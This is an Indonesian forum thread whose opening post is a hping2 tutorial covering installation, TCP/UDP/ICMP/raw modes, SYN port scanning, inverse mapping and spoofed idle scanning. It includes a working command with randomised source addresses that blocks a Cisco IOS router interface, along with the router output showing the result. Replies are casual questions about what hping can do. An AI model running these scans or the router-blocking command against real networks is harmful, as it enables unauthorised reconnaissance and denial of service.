Search
 
 

Display results as :
 


Rechercher Advanced Search

Top posters
agoenk (2095)
 
viyan_cs (1036)
 
b-joe (749)
 
ieyaz_Chuit (725)
 
Zell Aristocrats (667)
 
jun43d1 (638)
 
Hetro_fabio (314)
 
twinkblack (265)
 
suzee_tkj2 (237)
 
harmoko (184)
 

December 2016
MonTueWedThuFriSatSun
   1234
567891011
12131415161718
19202122232425
262728293031 

Calendar Calendar

Affiliates
tkjpower.multiply.com
 

tahukah anda tentang hping..?

View previous topic View next topic Go down

tahukah anda tentang hping..?

Post by viyan_cs on Wed Mar 24, 2010 10:06 am

Hping adalah sebuah TCP/IP assembler. Tidak seperti ping command yang hanya
dapat mengirim ICMP echo request, hping juga dapat mengirim paket TCP, UDP,
ICMP, dan RAW-IP protocols. Hping dapat digunakan untuk berbagai macam
keperluan, yaitu:
• Mengetes firewall
• Port scanning
• Network testing, dengan menggunakan protokol yang berbeda-beda
• Remote OS fingerprinting
• Remote uptime guessing
• TCP/IP stacks auditing
• Traceroute
• Manual path MTU discovering

Instalasi Hping

Program hping dapat diperoleh secara gratis dengan cara mendownloadnya
pada situs www.hping.org
Nama file yang didapatkan adalah hping2.tar.gz disini saya menggunakan linux.
File dalam bentuk ini tidak dapat langsung diinstall, untuk dapat menginstalnya file ini harus didecompreesed terlebih dahulu. Perintah yang digunakan untuk mendecompreesed file tersebut
adalah gunzip, jadi untuk mendecompreesed file hping2.tar.gz digunakan perintah
seperti berikut:
Code:
[root@localhost root]#gunzip hping2.tar.gz
Setelah perintah tersebut diberikan maka file hping2.tar.gz akan berubah
menjadi hping2.tar , bentuk file ini juga masih belum dapat digunakan, untuk dapat
menggunakannya harus diketikkan perintah seperti berikut:
Code:
[root@localhost root]#tar xvf hping2.tar
Setelah perintah tersebut diketikkan maka semua file (biasanya dibuat dalam
satu folder, dalam hal ini folder hping2) sudah dapat diakses, untuk menginstall
program hping, harus diketikkan perintah berikut pada folder hping2:
Code:
[root@localhost hping2]#./configure
[root@localhost hping2]#make
[root@localhost hping2]#make install
Apabila tidak bermasalah maka program hping sudah dapat dijalankan.

Protokol-protokol Yang Dapat Digunakan

TCP adalah default protocol pada program hping, secara default hping akan
mengirim TCP headers ke port 0 host target dengan winsize 64 dan tanpa adanya
TCP flag yang on. Biasanya ini adalah cara yang terbaik untuk melakukan hide ping,
dan sangat berguna ketika target dilindungi firewall yang tidak memperbolehkan
ICMP untuk lewat dan juga dengan mengirim TCP nullflag ke port 0 mempunyai
kemungkinan yang cukup besar untuk tidak tercatat pada target.

Selain protokol TCP, protokol lainnya yang dapat digunakan untuk mengirim
paket ke target adalah sebagai berikut:
• RAW IP
Pada mode ini hping akan mengirim paket IP yang sama seperti paket yang
dikirimkan dari sebuah aplikasi, sehingga taget akan mengira bahwa paket yang
dikirimkan adalah sebuah paket dari sebuah aplikasi.
Apabila diiginkan untuk mengirim paket IP ke target maka perintah yang harus
diketikkan adalah sebagai berikut:
Code:
[root@localhost hping2]#hping –0 [target host] [option]
• ICMP
Pada mode ini, secara default hping akan mengirim ICMP echo-request, tetapi
kita dapat juga untuk megeset tipe-tipe ICMP yang lain denagn menggunakan –
icmptype –icmpcode
Apabila diiginkan untuk mengirim paket ICMP ke target maka perintah yang
harus diketikkan adalah sebagai berikut:
Code:
[root@localhost hping2]#hping –1 [target host]
• UDP
Pada mode ini, secara default hping akan mengirim paket UDP ke port 0 target
host. UDP header dapat diatur dengan menggunakan –baseport , –destport, --
keep.
Apabila diiginkan untuk mengirim paket UDP ke target maka perintah yang
harus diketikkan adalah sebagai berikut:
Code:
[root@localhost hping2]#hping –2 [target host] [option]

Fungsi-fungsi Hping


Port Scanning
Dengan menscan port taget host, kita dapat mengetahui port-port yang terbuka
pada target host. Untuk dapat menscan port target host, kita kirim paket TCP dengan
flag SYN on ke target host yang ingin discan portnya. Apabila port target membalas
dengan flag SA maka port tersebut terbuka sedangakan apabila port target membalas
dengan flag RA maka port tersebut tertutup. Berikut ini adalah contoh dari port
scanning :
Code:
[root@localhost sbin]# hping 152.102.20.184 -S -p ++22
HPING 152.102.20.184 (eth0 152.102.20.184): S set, 40 headers + 0 data bytes
len=46 ip=152.102.20.184 ttl=128 id=56775 sport=22 flags=RA seq=0 win=0 rtt=0.5 ms
len=46 ip=152.102.20.184 ttl=128 DF id=56776 sport=23 flags=SA seq=1 win=16616 rtt=0.6 ms
len=46 ip=152.102.20.184 ttl=128 id=56777 sport=24 flags=RA seq=2 win=0 rtt=0.5 ms
len=46 ip=152.102.20.184 ttl=128 DF id=56778 sport=25 flags=SA seq=3 win=16616 rtt=0.5 ms
len=46 ip=152.102.20.184 ttl=128 id=56779 sport=26 flags=RA seq=4 win=0 rtt=0.5 ms
Dari hasil scanning dari alamat IP 152.102.20.184 dapat terlihat bahwa port
23 dan port 25 terbuka, sedangkan port 22, 24, 26 tertutup.

Inverese Mapping
Inverse mapping dilakukan untuk mengetahui host yang aktif atau tidak. Cara
untuk melakukan Inverse mapping adalah mengirimkan paket TCP dengan mengeset
flag reset. Apabila tidak didapatkan respon maka dapat disimpulkan bahwa host
tersebut aktif, tetapi apabila mendapat respon “ICMP host unreachable” maka dapat
disimpulkan bahwa IP address tujuan tidaklah digunakan. Berikut ini adalah contoh
dari inverse mapping:
Code:
[root@localhost sbin]# hping 152.102.20.183 -R
HPING 152.102.20.183 (eth0 152.102.20.183): R set, 40 headers + 0 data bytes
ICMP Host Unreachable from ip=152.102.20.183 name=UNKNOWN
ICMP Host Unreachable from ip=152.102.20.183 name=UNKNOWN
ICMP Host Unreachable from ip=152.102.20.183 name=UNKNOWN
ICMP Host Unreachable from ip=152.102.20.183 name=UNKNOWN
ICMP Host Unreachable from ip=152.102.20.183 name=UNKNOWN

Dari contoh di atas dapat disimpulkan bahwa host dengan IP 152.102.20.183
tidaklah aktif.

Code:
[root@localhost sbin]# hping 152.102.20.184 -R
HPING 152.102.20.184 (eth0 152.102.20.184): R set, 40 headers + 0 data bytes
--- 152.102.20.184 hping statistic ---
4 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
Dari contoh di atas dapat disimpulkan bahwa host dengan IP 152.102.20.184
dalam keadaan aktif

IOS Exploit Test
Berikut ini contoh yang menunjukkan kelemahan pada IOS router (IOS
exploit). Hal ini dilakukan dengan mengirimkan paket IP dengan ttl=0, ipproto =
53/55/77/103 , count=76, data=26. Berikut ini adalah perintah yang dapat
menyebabkan interface router yang menjadi target tidak dapat menerima inbound
packet(pada contoh ini router memiliki alamat IP 10.7.7.3 sedangkan terminal yang
dipakai untuk “menyerang” router memiliki alamat IP 10.7.7.5):

Code:
[root@localhost sbin]# hping 10.7.7.3 --rawip --rand-source --ttl 0 --ipproto 55 --count 76 -
-interval u250 --data 26
HPING 10.7.7.3 (eth0 10.7.7.3): raw IP mode set, 20 headers + 26 data bytes
--- 10.7.7.3 hping statistic ---
76 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms

Arti argumen-argumen pada perintah di atas adalah:
• --rawip
Argumen ini berarti paket yang dikirim menggunakan protokol rawip
yang sudah dibahas pada bagian III.2.
• --rand-source
Argumen ini berguna merupakan kependekan dari random source yang
berguna agar router pada alamat IP 10.7.7.3 tidak mengetahui asal dari
paket ini.
• --ttl 0
Argumen ini berarti time-to-live dari paket ini adalah 0, time-to-live adalah
“umur” dari paket yang dikirim.
• --ipproto 55
Argumen ini berarti paket rawip yang dikirim menggunakan protokol IP
55, protokol IP yang dapat digunakan untuk dapat melakukan “serangan”
ini adalah 53, 77, 103.
• --count 76
Argumen ini berarti paket yang dikirim berjulah 76.
• --interval u250
Argumen ini berarti selang waktu antara paket satu dengan paket
berikutnya adalah 250 uS.
• --data 26
Argumen ini berarti dalam paket yang dikirim terdapat data sebesar 26
bytes yang berfungsi agar paket yang dikirim terlihat seolah-olah seperti data dari suatu program aplikasi.

Setelah paket tersebut dikirim, maka kita tidak dapat mengirimkan paket ke
interface tersebut karena interface tersebut dalam keadaan blocking. Berikut ini
adalah contoh yang menunjukkan bahwa interface yang dituju tidak dapat menerima
paket yang ditujukkan padanya:

Code:
[root@localhost sbin]# hping 10.7.7.3 --count 5
HPING 10.7.7.3 (eth0 10.7.7.3): NO FLAGS are set, 40 headers + 0 data bytes
--- 10.7.7.3 hping statistic ---
5 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
Apabila kita melihat interface router yang diserang maka akan dapat dilihat hasil
sebagai berikut:
Code:
Wg_ro_f#show interface ethernet0
Ethernet0 is up, line protocol is up
Hardware is AmdP2, address is 0050.500e.f1e0 (bia 0050.500e.f1e0)
Internet Address is 10.7.7.3 /24
MTU 1500 bytes, BW 10000 Kbit, DLY 1000 usec, rely 255/255, load 1/255
Encapsulation ARPA, loopback not set, keepalive (10 sec)
ARP type: ARPA, ARP timeout 04:00:00
Last input 00:00:4, output 00:00:07, output hang never
Last clearing of “show interface” counters 00:07:18
Input queue: 76/75/1091/0(size/max/drops/flushes);total output drops:0
Pada bagian input queue terlihat bahwa interface ethernet0 tersebut dalam
keadaan blocked.

Iddle Scanning
Idle Scanning adalah salah satu cara dalam scanning port dengan
menggunakan spofeed packet, dengan menggunakan cara ini maka target host tidak
akan mengetahui alamat IP kita yang sebenarnya. Untuk dapat melakukan Idle
Scanning dibutuhkan sebuah host yang sering disebut sebagi silent host, selain host
yang men-scan dan host yang ingin di-scan.
Pertama-tama kita lihat IPID dari silent host,dengan menggunakan perintah
(asumsi alamat dari silent host adalah 152.102.20.158)

Code:
[root@localhost hping2]#hping 152.102.20.158–r
HPING  152.102.20.158 (eth0 152.102.20.158): no flags are set, 40 data bytes
60 bytes from 152.102.20.158: flags=RA seq=0 ttl=64 id=41660 win=0 time=1.2 ms
60 bytes from 152.102.20.158: flags=RA seq=1 ttl=64 id=+1 win=0 time=75 ms
60 bytes from 152.102.20.158: flags=RA seq=2 ttl=64 id=+1 win=0 time=91 ms
60 bytes from 152.102.20.158: flags=RA seq=3 ttl=64 id=+1 win=0 time=90 ms
60 bytes from 152.102.20.158: flags=RA seq=4 ttl=64 id=+1 win=0 time=91 ms
60 bytes from 152.102.20.158: flags=RA seq=5 ttl=64 id=+1 win=0 time=87 ms

Dapat dilihat bahwa IPID bertambah 1 secara teratur.
Setelah melihat IPID dari silent host, langkah selanjutnya adalah mengirimkan
paket TCP dengan flag SYN ke port yang dituju pada host target dengan
menggunakan IP dari silent host, apabila port yang dituju pada host target terbuka
maka host target akan mengirimkan SYN|ACK ke silent host, dan silent host akan
membalas paket kiriman ini dengan RST, maka IPID dari silent host akan bertambah
menjadi +2.

Code:
60 bytes from 152.102.20.158: flags=RA seq=17 ttl=64 id=+1 win=0 time=96 ms
60 bytes from 152.102.20.158: flags=RA seq=18 ttl=64 id=+1 win=0 time=80 ms
60 bytes from 152.102.20.158: flags=RA seq=19 ttl=64 id=+2 win=0 time=83 ms
60 bytes from 152.102.20.158: flags=RA seq=20 ttl=64 id=+1 win=0 time=92 ms
Berarti port dari target host terbuka
Tetapi apabila port yang dituju pada target host tertutup maka silent hosts
akan menerima RST paket dari target host, dan silent host tidak akan menjawab apa-apa.

Code:
60 bytes from 152.102.20.158.:flags=RA seq=52 ttl=64 id=+1 win=0 time=85 ms
60 bytes from 152.102.20.158: flags=RA seq=53 ttl=64 id=+1 win=0 time=83 ms
60 bytes from 152.102.20.158: flags=RA seq=54 ttl=64 id=+1 win=0 time=93 ms
sumber www.hping.org


Last edited by viyan_cs on Fri Mar 26, 2010 12:20 am; edited 1 time in total

viyan_cs
tkj geek
tkj geek

Posts : 1036
Join date : 2009-03-19
Age : 25
Location : bogkids

Back to top Go down

Re: tahukah anda tentang hping..?

Post by agoenk on Wed Mar 24, 2010 11:35 am

wah wah...keren juga ya hping...ini bisa buat limiter bandwith juga ga ya?? kl bisa kaya router donk jadinya..... Smile

agoenk
tkjholic
tkjholic

Posts : 2095
Join date : 2009-03-11

Back to top Go down

Re: tahukah anda tentang hping..?

Post by viyan_cs on Thu Mar 25, 2010 7:28 pm

agoenk wrote:wah wah...keren juga ya hping...ini bisa buat limiter bandwith juga ga ya?? kl bisa kaya router donk jadinya..... Smile
ya bisa pak..hping juga bisa buat tes firewall yang kita buat dan masih banyak lagi kegunaannya..

viyan_cs
tkj geek
tkj geek

Posts : 1036
Join date : 2009-03-19
Age : 25
Location : bogkids

Back to top Go down

Re: tahukah anda tentang hping..?

Post by agoenk on Sat Mar 27, 2010 7:30 am

viyan_cs wrote:
agoenk wrote:wah wah...keren juga ya hping...ini bisa buat limiter bandwith juga ga ya?? kl bisa kaya router donk jadinya..... Smile
ya bisa pak..hping juga bisa buat tes firewall yang kita buat dan masih banyak lagi kegunaannya..

wah wah...tp disamping itu mungkin ada juga kekurangan2 nya ya mas ?? ada ga kira2 kekurangan dibandingkan dengan router misalnya...

agoenk
tkjholic
tkjholic

Posts : 2095
Join date : 2009-03-11

Back to top Go down

Re: tahukah anda tentang hping..?

Post by viyan_cs on Sat Mar 27, 2010 12:11 pm

agoenk wrote:
viyan_cs wrote:
agoenk wrote:wah wah...keren juga ya hping...ini bisa buat limiter bandwith juga ga ya?? kl bisa kaya router donk jadinya..... Smile
ya bisa pak..hping juga bisa buat tes firewall yang kita buat dan masih banyak lagi kegunaannya..

wah wah...tp disamping itu mungkin ada juga kekurangan2 nya ya mas ?? ada ga kira2 kekurangan dibandingkan dengan router misalnya...
sebelumnya mohon maaf klo jawaban saya kurang lengkap or tidak memuaskan..
dilihat dari segi fungsinya Router berfungsi sebagai penghubung antar dua atau lebih jaringan untuk meneruskan data dari satu jaringan ke jaringan lainnya.sedangkan hping berfungsi untuk penentration testing dari router yang kita buat..semisal di router kita pake firewall maka hping bisa digunakan untuk mengetesnya..dibandingkan dengan router hping tidak bisa untuk penghubung seperti halnya router tapi dengan adanya hping sendiri kita dapat memanipulasi paket data sehingga memungkinkan transfer data dapat berpengaruh pada router...mungkin ada yang mau melengkapi..karna jujur saya masih belajar...terima kasih..

viyan_cs
tkj geek
tkj geek

Posts : 1036
Join date : 2009-03-19
Age : 25
Location : bogkids

Back to top Go down

Re: tahukah anda tentang hping..?

Post by gantex on Sun Apr 11, 2010 3:39 pm

agoenk wrote:
viyan_cs wrote:
agoenk wrote:wah wah...keren juga ya hping...ini bisa buat limiter bandwith juga ga ya?? kl bisa kaya router donk jadinya..... Smile
ya bisa pak..hping juga bisa buat tes firewall yang kita buat dan masih banyak lagi kegunaannya..

wah wah...tp disamping itu mungkin ada juga kekurangan2 nya ya mas ?? ada ga kira2 kekurangan dibandingkan dengan router misalnya...


limiter bandwith dalam hping yang di maksud dalam hal penetration berapa besar bandwith yang mau di kirim ke suatu interface , ,
(dalam lingkup jaringan) , ,
bukan untuk setting bandwith ,

Very Happy

gantex
newbie tkj
newbie tkj

Posts : 73
Join date : 2009-03-12

Back to top Go down

Re: tahukah anda tentang hping..?

Post by Sponsored content Today at 12:46 pm


Sponsored content


Back to top Go down

View previous topic View next topic Back to top

- Similar topics

 
Permissions in this forum:
You cannot reply to topics in this forum